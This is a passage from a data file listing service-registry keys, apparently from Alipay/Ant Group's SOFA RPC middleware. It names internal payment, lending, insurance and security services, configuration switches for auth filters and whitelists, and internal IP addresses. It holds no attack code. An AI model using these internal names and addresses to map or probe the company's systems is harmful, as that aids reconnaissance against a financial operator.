INSTANCE_ID#@#SOFA_ROUTER","NS_Sub_Servers_TP_B_TRADE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.paycore.service.payment.asset.AssetFluxService:1.0:assettransFluxService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findataprod.api.report.ReportQualityService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@inslifeprod#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.ipay.ifundprod.common.service.facade.api.AccountTransferService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.finmarket.FinMarketServiceCategoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afx.tr.server.facade.testService:1.0:uniqueId@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inschainproc.common.service.facade.api.InsSupervisionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:zhubalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revol.core.service.facade.ScriptChecker:1.0:cp_core_aml@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.243.98#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.common.core.client.AppInvokeService:1.0:pcreditsceneprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundprod.common.service.facade.product.manage.Fund07FileDisposeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchishub.common.service.facade.api.OneStopScriptConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insrenewprod.common.service.facade.api.renewal.InsRenewalSignFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bbcmng.common.service.facade.CqcBranchRuleQueryFacade:1.0:bbcmngService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbdatafactory.common.service.facade.datasource.DataConsumeRouterManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoplaycenter.common.account.facade.api.AccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemsgprod.common.service.facade.admin.audit.LifeMsgAuditTaskAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yfd.common.service.facade.dm.DomainModelServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.58#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.antmember.common.service.facade.growthplus.groupgrowth.ExchangeStrategyDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.finpwm:name=com.alipay.finpwm.biz.ryb.drm.RYBParamDrmManager.rybBuyTimesTairExpire,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secuprod.biz.shared.infosec.InfoSecService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.data.process.facade.table.DataProcessTableService:1.0:data-process@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloandecision.common.service.facade.service.ContractDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antcloud.productcenter.common.service.facade.rest.ProductManageSofaRestService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.101.7#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finbaservice.common.service.integration.cif.CifServiceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S_meshysale_service#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.assettrans.facade.goldetf.api.GoldtransManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.insmobile.communityShardDataSource.validator,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mshopcenter.common.service.facade.api.ShopPropQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.scheduler.common.cluster.resource.TaskAssignResource.assignAsSlave,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcinstmng.facade.api.instaccess.InstAccessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.common.astconfig.api.AstconfigManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.cif.client.drm.CifTouchCacheSwitcher.touchRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mservicesinspect.biz.service.inspect.rpc.gw.InspectFailureGWFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxian.insrap.facade.LocationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rccenter.common.service.facade.RccenterHgCheckProblemFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:stocksupervise@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acccenter.common.service.facade.inner.ProductOfferFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zappinfo:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererWhiteUrls,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.huanyu.facade.change.ChangeTargetLockFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.156.123#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterMerchantUnionDrmResource.unionEntryGrayNeed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.166.236.79#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finpwm:name=com.alipay.cifcommon.business.platform.useragreement.drm.UserAgreementClientSwitch.hisQueryRpcSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S_openmonitor_cloudmonitortask#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.AntVip-Server:name=com.alipay.antvip.server.conf.DrmControl.pollWorkerExecutorMaxPoolSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.Arch:name=com.alipay.sofa.platform.xts.bacs.drm.ActionAppInfo.asynCommitFiredForPressureTest,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.igopcore.common.service.facade.MemberDraftFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:cicada@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_FINASSETTRADE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.152.78#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.csplatform.service.facade.api.OperateLogService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mpaasweb.common.service.facade.replays.BizFaultDiagnosisCallBackFacade:1.0:csvoice-callback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imasp.common.service.facade.playcenter.PlayGroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@insmerchantprod#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.antaid.common.service.facade.spi.AntaidEventSubscriber:1.0:fdpConfigChangeSubscriber@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebplus.common.facade.service.api.YebsTransferInService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.common.service.facade.operation.OperationPlanQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.archimedes.common.service.facade.api.ArchimedesGraphQLService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.ZhouZhouLeInternalService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkcupacore.common.service.facade.api.AuthorizationRelationManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_FINHINETCORE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechat.common.service.facade.spi.bc.BcBusinessInfoFacade:1.0:leadsBcBusinessInfoFacadeServiceImpl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileiclib.common.service.facade.zproxy.ValidateZpFacade:1.0:validatePpwZpFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rinsight.common.base.spi.RinsightCommonRpcSpi:1.0:miniAppDeveloperQueryService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zerox.common.service.facade.AdvisoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ilogin.common.service.facade.api.oauth.OAuthApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.178.63#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insclaimcenter.common.service.InsUserReportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unifygw.facade.service.UnifygwFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:almspmo-bugatti#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.25.163.215#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mdiscountprod.common.service.facade.ticket.api.MerchantTicketDeleteService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.payboss.onestop.engine.OnestopEngine:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insptmarket.facade.consultant.api.ConsultantServeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmFopConfig.closeMfinpromoReqSourceFromStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileappcommon.common.service.facade.baas.SxmStubMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfoprod.common.service.company.facade.CompanySolutionProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lego.common.service.facade.data.DataOpenApiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.AntVip-Server:name=com.alipay.antvip.server.conf.DrmControl.healthCheckLatency,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.174.32#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.customscenter:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableAuthFilter,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mfinsnsprod.service.facade.api.feed.VideoFeedFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.biz.manager.ClientPerfDiagnoseManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkpromocore.common.service.facade.BenefitSendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ifundcontrolmodel.core.service.physicaltransactionfund.FundCapabilityModelTransactionLevelEndToEndService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.service.CapitalTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.arks:name=com.alipay.arks.drm.DRMDomainResource.arksSceneDomainJson,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zbdm.common.service.facade.phytable.CapTableInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.bizprod.common.service.facade.api.UserQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.prodquery.common.service.api.ProductCategoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.erecon.common.service.facade.query.api.ErcInstAccountQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insscenemarket.dsdb.facade.GrayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:oss-clients@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.huanyu.facade.change.ChangeBatchExecService:1.0:securityops@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.open.facade.OpenFeedQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.82.87.118#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fintradecenter.common.service.facade.trade.accountgold.CommoditiesOrderOperateShadowFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.dockerlabapp:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.globalOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.mif.common.service.facade.org.OrganizationMemberQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.common.schedule.thread.LoanTaskShared.maxPoolSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gotone.common.service.api.SendMailService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finlinkdata.common.service.facade.riskeva.service.RiskEvaluationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.recneptune.common.service.integration.cache.CacheClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundselling.share.redeem.service.RedeemConfirmFileServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.prodquery.common.service.facade.standard.api.arrangement.ArrangementCheckQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iliquidity.biz.manager.mng.PageTableColumnManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:testone123@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.135.252#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.rinsight.biz.customized.spi.FeatureRelationSpi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:fintaskmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.xtrans.AssetFinalizeService:1.0:financingYebAsset@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotbsp.business.facade.sendme.SendMeTemplateService:1.0:iotbsp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tradequery.common.service.facade.TradeapFreezeOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxquote.core.service.sourcequote.SourceQuoteOuterService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.kgengine.core.service.concept.ConceptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.167.207.52#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.paycore.service.common.api.receipt.ReceivePayAckEsbService:1.0:pucprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.consult.api.AssetConsultService:1.0:mcard@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mrchcommerce.fmcgcore.common.service.facade.api.shop.ShopManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.omp.common.service.facade.api.BizOperateLogQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custprod.service.api.AccountCancelOperateFacade:1.0:bksupplychainprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.128.92#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_O_RDCP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zappinfo:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.vmEmergencySwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileha.core.service.exceptionana.CrashAnalysisService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.190.51#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.airbops:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableGlobalSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.clive.common.service.facade.api.ServicePointQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.publishing.common.facade.publish.PublishRecordApi:1.0:dppublishing@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfinvest.facade.api.investment.InvestInsiderTradingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.134.67#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Sub_Servers_TP_M_MERCHANT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.publiccore.common.service.facade.qrcode.QrCodeScanMessageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkcontractcore.facade.legal.LegalContractTemQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.163.191#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.73.160.10#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cifcommon.business.platform.o2o.facade.AreaCodeCovertFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetprod.common.facade.AssetLiquidityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.242.92#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:loadcentercloud@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.irlab.facade.SelfCureFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.charge:name=com.alipay.cif.client.drm.CifQueryLocalCacheSwitcher.capacity,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antsports.common.service.facade.TeleportConfigCenterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.bizlogicide.common.service.facade.api.BizLogicGatewayApiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.comment.ServiceCommentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finadvisorprod.common.service.facade.api.LCSDashBoardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkloancollection.common.service.facade.collcase.CollCaseRepayHandleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.finfundprod.common.service.facade.FundAssetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.ifxposition.service.facade.decision.FxPostTradeFlowDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.transfercenter.common.service.facade.ldc.api.TransferConsultRProxyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.172.76#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.client.SystemAppInvokeService:1.0:clearingcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizfund.common.service.facade.allocation.EntrustWithdrawAgreementQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ismonitor.core.service.censor.msgbuild.RuleMsgBuildService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zprodqueryTairCache_dest.compressionType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.antcloud.esp.hbase.interfaces.endpoint.facade.rest.DrmRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.codelab.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.158.235#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.prodmng:name=com.alipay.routeclient.DefaultRouteCoordinator.elasticRuleVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.166.129.78#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cschannel.common.service.facade.message.service.EventMessageService:1.0:incService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.100.102#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.rcacheTairCache_dest.useKeyRouteInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.opencore.service.facade.app.AppInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.secretcore.endpoint.facade.SecretRotationRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.customerTairCache_dest.useKeyRouteInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:agdscsalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:certifyweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:securitysimulate@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antcloud.productcenter.common.service.facade.CommonBuyConfigInnerServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_192.168.31.25#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finzyprod.facade.loan.api.ZyAccessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.meshyserver.common.service.facade.spi.ServiceReleaseQueryFacade:1.0:csbizcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insapportion.common.service.facade.OverdueRepaymentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_O_AQC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbcontent.common.service.facade.api.audit.AuditTaskManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcube.common.service.facade.page.ProductConfigIotFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDrmImpl.minTargetAmount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cloudprovision:name=cn.com.antcloud.common.auth.client.config.ZauthMigrationDrmConfigTrigger.whiteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.clearingcenter.core.service.file.generator.FileGenerator:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.shop.MrchProdShopPageQueryMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gffund.common.service.facade.api.gfpayment.BlockChainTransferNotifyFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.aciamcore.common.service.facade.identity.UserServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.service.loan.impl.support.drm.LpLoanApplyConfigDrm.loanApplyStatusChange,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.giftprod.common.service.facade.wufu.WufuTaskSendAssetsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.securitysimulate.common.service.client.drm.SimulateFlowResource.msgbrokerAmbushRecordOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.abilitycore.common.service.facade.solution.callback.SceneApplyCallback:1.0:mountPackageCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.zpaas.zappinfo.facade.query.NcFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.insusercenter.facade.category.api.InsCategoryQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicore.common.service.facade.appdeploy.api.DevelopPackageOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditbatch.service.MYBKDepositQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finasmcore.common.service.facade.salesrecord.RealtimeSalesRecordQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:socplt@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.customscenter:name=com.alipay.customscenter.biz.declare.drm.CommonConfig.needReDeclareZONGSHUCodes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cloud.apfasmng.common.service.facade.antvip.ServerlessPaasAntVipFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ALIPAYJSESSIONID.elastic,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promoprod.common.service.facade.isv.IsvMerchantBatchChangeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDrmImpl.loadCompleteDaemonSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insusercenter.facade.user.api.InsPlatformUserDegreeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.jss.facade.service.openapi.JobOpenService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.amldata.com.service.facade.api.amlfeature.AmlFeatureQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservcore.common.service.facade.kbjob.KbJobLabelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifecustprod.common.service.facade.following.FollowingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.WTConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.charge.addp_tddl_ds.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchprod.common.service.facade.merchant.MerchantDataAnalyseFacade:1.0@DE